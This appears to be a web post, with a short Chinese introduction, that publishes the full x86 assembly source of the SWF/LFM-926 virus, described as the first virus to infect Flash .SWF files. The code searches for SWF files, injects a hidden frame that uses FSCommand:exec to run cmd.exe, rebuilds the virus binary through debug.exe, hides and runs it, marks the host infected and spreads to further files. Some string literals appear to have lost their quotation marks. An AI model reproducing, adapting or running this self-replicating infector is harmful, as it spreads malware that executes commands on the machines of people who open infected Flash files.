第一只感染flash的病毒源代码

本文介绍了一种针对SWF文件的病毒,该病毒通过修改Flash文件的头部信息并插入恶意代码来实现感染。它利用标准格式将病毒从二进制转换为十六进制字符,并插入到宿主文件中。


SWF/LFM-926 Virus: 

; ------------------ 

; Description: WinNT/XP Virus dropper for Flash .SWF files! 

; Masm Version 6.11: ML.EXE SWF.ASM 

; Virus Size: 926 bytes 

; Infection Size: 3247 bytes. 

; Last Edit: 01/08/2002 

; --------------------------------- Begin Source Code ------------------------------------ 



.286 

.model tiny 

.code 

org 100h Entry: jmp Start 

VIR_SIZE equ Virus_End-Entry 

DTA db 128 dup(0) ; Offset DTA+30 = filename 

HANDLE dw ? ; Handle to host file 

PTR1 dd 0 ; Segment address of the created memory block 

PATH db "*.SWF",0 ; File mask 

BINARY db "v.com",0 ; Binary code 

HEX db "0123456789ABCDEF" ; Binary to hex 

; Flash header block. 

; ------------------- 

SIGN_FW dw ? ; SWF file format 

SIGN_S db ? 

VERSION_NUM db ? 

FILE_LENGTH dw ? 

dw ? 

STATIC_HDR_SIZE equ $-SIGN_FW 

RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isnt static. ;( 

RECT_BUF_SIZE equ $-RECT_BUF 

HDR_SIZE dw ? ; Holds the true header size! 

; Start of Viral Frame 0. 

; ----------------------- 

Drop_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes! 

TAG_LENGTH dw 0 ; (ACTION LENGTH+3)+1[END_TAG] 

dw 0 

db 083h ; ActionGetUrl Tag 

ACTION_LENGTH dw 0 ; (Drop_BEGIN_SIZE-9)+(SUM OF Drop_MIDDLE)+(Drop_END_SIZE) 

db FSCommand:exec 

db 000h 

db cmd.exe 

db 009h ; chr(9) is Flash code for a space character. 

db /c 

db 009h 

db echo 

db 009h 

db Loading.Flash.Movie... 

db & 

db (echo 

db 009h 

db n 

db 009h 

db v.com&echo 

db 009h 

db a 

db 009h 

db 100& 

Drop_BEGIN_SIZE equ $-Drop_BEGIN 

Drop_MIDDLE db echo 

db 009h 

db db 

db 009h 

db 71 dup(,) ; db XX,...,XX where XXs are viral hex codes. 

db & 

Drop_MIDDLE_SIZE equ $-Drop_MIDDLE 

Drop_END db &echo.&echo 

db 009h 

db rcx&echo 

db 009h 

db 39E ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes. 

db &echo 

db 009h 

db w&echo 

db 009h 

db q)|debug.exe>nul&start 

db 009h 

db /b 

db 009h 

db v.com 

db 000h ; StringEnd Tag 

Drop_END_SIZE equ $-Drop_END 

; End of Viral Frame 0. 

; --------------------- 

END_TAG db 001h ; Action code 0x01 = tagshowframe Tag 

Start: 

mov ax,(VIR_SIZE+0fh) 

shr ax,4 

shl ax,1 

mov bx,ax ; Allocate (VirusSize*2) 

mov ah,4ah 

int 21h ; Resize block 

jc ExProg 

mov dx,offset DTA ; Set DTA operation 

mov ah,1ah 

int 21h 

mov cx,07h 

mov dx,offset PATH 

mov ah,4eh ; FindFirst 

int 21h 

jc ExProg 

jmp Infect 

Cycle: 

mov dx,offset PATH 

mov ah,4fh ; FindNext 

int 21h 

jc ExProg 

jmp Infect 

ExProg: 

mov ax,4301h ; Hide v.com 

mov cx,02h 

mov dx,offset BINARY 

int 21h 

mov ax,4c00h ; End program 

int 21h 

Infect: 

mov byte ptr DTA[30+12],$ 

mov dx,offset (DTA+30) 

mov ax,3d02h ; Open host file 

int 21h 

jc ExProg 

mov [HANDLE],ax ; Save file handle 

mov ax,3f00h ; Read file Header 

mov dx,offset SIGN_FW 

mov bx,[HANDLE] 

mov cx,(STATIC_HDR_SIZE+RECT_BUF_SIZE) 

int 21h 

jc ExProg 

cmp word ptr SIGN_FW,WF ; Check for a valid Flash SWF file. 

jne Cycle ; Try another file ... 

cmp byte ptr SIGN_S,S 

jne Cycle 

cmp byte ptr VERSION_NUM,099h ; Already infected? 

je Cycle 

mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag. 

xor di,di ; Seems to always exist directly after the header. 

next: cmp byte ptr RECT_BUF[di],043h 

jne not_found 

cmp byte ptr RECT_BUF[di+1],002h 

jne not_found 

jmp found 

not_found: 

inc di 

loop next 

jmp Cycle 

found: 

mov word ptr HDR_SIZE,STATIC_HDR_SIZE 

add word ptr HDR_SIZE,di ; Compute the header size 

mov ax,4200h ; Reset file ptr right after Flash header 

xor cx,cx 

mov dx,[HDR_SIZE] 

int 21h 

jc ExProg 

push bx 

mov ax,word ptr FILE_LENGTH 

add ax,15 

shr ax,4 

mov bx,ax 

mov ah,48h ; Allocate memory for target host file 

int 21h 

pop bx 

jc ExProg 

mov word ptr PTR1[2],ax ; Save pointer to allocated block 

mov cx,word ptr FILE_LENGTH 

sub cx,[HDR_SIZE] 

mov ah,3fh ; Read host file into memory block 

push ds 

lds dx,[PTR1] 

int 21h 

pop ds 

jc ExProg 

mov ax,4200h ; Reset file ptr to the middle code section 

xor cx,cx 

mov dx,[HDR_SIZE] 

add dx,Drop_BEGIN_SIZE 

int 21h 

jc ExProg 

; 

; The following code is a key technique. It simply converts the 

; virus from binary to hex characters and then inserts them into the host 

; using a standard format that DEBUG.EXE expects! Flash only really 

; allows plain text, so this satisfies that condition. 

; 

mov word ptr ACTION_LENGTH,(Drop_BEGIN_SIZE-9+Drop_END_SIZE) 

push bx 

mov cx,VIR_SIZE 

xor si,si 

xor di,di 

ToHex: 

mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex humber 

mov al,byte ptr Entry[si] 

mov ah,al 

and al,00001111y 

xlat 

mov Drop_MIDDLE[STATIC_HDR_SIZE+di+1],al 

shr ax,12 

xlat 

mov Drop_MIDDLE[STATIC_HDR_SIZE+di],al 

inc si 

inc di 

inc di 

inc di 

mov ax,si 

mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line. 

div bl 

or ah,ah 

jnz cont 

push cx 

xor di,di 

add word ptr ACTION_LENGTH,Drop_MIDDLE_SIZE 

mov bx,[HANDLE] ; Write hex dump entry XX,...,XX 

mov dx,offset Drop_MIDDLE 

mov cx,Drop_MIDDLE_SIZE 

mov ax,4000h 

int 21h 

jc ExProg 

pop cx 

cont: 

loop ToHex 

pop bx 

or di,di 

jz no_remainder 

mov dx,offset Drop_MIDDLE 

mov cx,di 

add cx,7 ; STATIC_HDR_SIZE-1 

add word ptr ACTION_LENGTH,cx 

mov ax,4000h ; Write remainder hex dump entry XX,...,XX 

int 21h 

jc ExProg 

no_remainder: 

mov dx,offset Drop_END 

mov cx,Drop_END_SIZE+1 

mov ax,4000h ; Write end code and end of frame tag(01) into host 

int 21h 

jc ExProg 

mov cx,word ptr FILE_LENGTH 

sub cx,[HDR_SIZE] 

mov ax,4000h ; Write host code directly after viral code. 

push ds 

lds dx,[PTR1] 

int 21h 

pop ds 

jc ExProg 

; Patch the header with new viral values. 

mov cx,word ptr ACTION_LENGTH 

add cx,4 

mov word ptr TAG_LENGTH,cx 

add cx,6 

add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH+6) 

; Set infection marker 

mov byte ptr VERSION_NUM,099h 

mov di,[HDR_SIZE] 

inc word ptr [SIGN_FW+di-2] ; Increase Frame count by 1 

mov ax,4200h ; Re-wind to start of file 

xor cx,cx 

xor dx,dx 

int 21h 

jc ExProg 

mov dx,offset SIGN_FW 

mov cx,[HDR_SIZE] 

mov ax,4000h ; Write updated viral header 

int 21h 

jc ExProg 

mov dx,offset Drop_BEGIN 

mov cx,Drop_BEGIN_SIZE 

mov ax,4000h ; Write begin code into host 

int 21h 

jc ExProg 

mov ah,49h ; Free memory block 

mov es,word ptr PTR1[2] 

int 21h 

jc ExProg 

mov ax,3e00h ; Close file 

int 21h 

jc ExProg 

jmp Cycle ; DONE! Try to infect another. 

Virus_End: 

end Entry
